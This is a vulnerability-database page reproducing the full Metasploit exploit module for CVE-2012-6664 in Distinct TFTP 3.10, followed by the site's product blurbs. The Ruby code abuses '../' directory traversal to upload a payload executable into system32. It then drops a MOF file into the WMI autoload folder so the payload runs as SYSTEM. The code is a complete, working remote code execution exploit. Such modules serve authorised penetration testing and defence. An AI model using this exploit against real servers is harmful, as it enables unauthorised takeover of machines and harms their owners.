Lucene search
K

Distinct TFTP 3.10 Writable Directory Traversal Execution

🗓️ 11 May 2012 20:07:31Reported by modpr0be, sinn3r <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 37 Views

Distinct TFTP 3.10 Writable Directory Traversal vulnerability in server component allowing remote code execution

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-6664
8 Apr 201200:00
circl
CNNVD
Distinct Intranet Servers Security Vulnerability
21 Jun 202400:00
cnnvd
Check Point Advisories
Distinct TFTP Writable Directory Traversal Execution (CVE-2012-6664)
21 Nov 201600:00
checkpoint_advisories
CVE
CVE-2012-6664
21 Jun 202400:00
cve
Cvelist
CVE-2012-6664
21 Jun 202400:00
cvelist
Exploit DB
Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)
8 Apr 201200:00
exploitdb
NVD
CVE-2012-6664
21 Jun 202422:15
nvd
Positive Technologies
PT-2024-10551 · Unknown · Tftp Server +1
21 Jun 202400:00
ptsecurity
RedhatCVE
CVE-2012-6664
22 May 202504:00
redhatcve
Vulnrichment
CVE-2012-6664
21 Jun 202400:00
vulnrichment
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in the TFTP
          Server component of Distinct Intranet Servers version 3.10 which
          allows a remote attacker to write arbitrary files to the server file
          system, resulting in code execution under the context of 'SYSTEM'.
          This module has been tested successfully on TFTP Server version 3.10
          on Windows XP SP3 (EN).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'modpr0be', # Initial discovery, PoC (Tom Gregory)
            'sinn3r' # Metasploit
          ],
        'References' =>
          [
            ['OSVDB', '80984'],
            ['EDB', '18718'],
            ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
            ['CVE', '2012-6664']
          ],
        'Payload' =>
          {
            'BadChars' => "\x00"
          },
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Platform' => 'win',
        'Targets' =>
          [
            ['Automatic', { 'auto' => true }],
          ],
        'Privileged' => true,
        'DisclosureDate' => '2012-04-08',
        'DefaultTarget' => 0
      )
    )

    register_options([
      OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
      OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
      OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
    ])
  end

  def upload(filename, data)
    tftp_client = Rex::Proto::TFTP::Client.new(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => 1025 + rand(0xffff - 1025),
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'LocalFile' => "DATA:#{data}",
      'RemoteFile' => filename,
      'Mode' => 'octet',
      'Context' => { 'Msf' => framework, 'MsfExploit' => self },
      'Action' => :upload
    )

    tftp_client.send_write_request { |msg| print_status(msg) }
    until tftp_client.complete
      select(nil, nil, nil, 1)
      tftp_client.stop
    end
  end

  def exploit
    exe_name = "#{rand_text_alpha(8..15)}.exe"
    exe = generate_payload_exe
    mof_name = "#{rand_text_alpha(8..15)}.mof"
    mof = generate_mof(mof_name, exe_name)
    traversal = '../' * datastore['DEPTH'].to_i

    print_status("Sending EXE (#{exe.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
    register_file_for_cleanup(exe_name)

    # Let the TFTP server idle a bit before sending another file
    select(nil, nil, nil, 3)

    print_status("Sending MOF (#{mof.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation